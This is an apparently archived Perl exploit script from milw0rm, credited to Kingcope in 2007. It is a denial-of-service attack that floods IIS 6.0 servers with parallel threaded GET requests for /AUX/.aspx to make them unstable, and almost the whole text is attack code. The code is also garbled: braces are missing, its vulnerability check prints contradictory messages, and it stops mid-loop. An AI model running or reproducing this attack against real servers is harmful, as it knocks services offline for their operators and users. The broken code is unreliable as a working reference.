#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#Kingcope kingcope@gmx.net
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
use IO::Socket;
use threads;
if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
print "ATTACK!\n";
for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100 ";
foreach $thr (threads->list) {
# milw0rm.com [2007-05-21]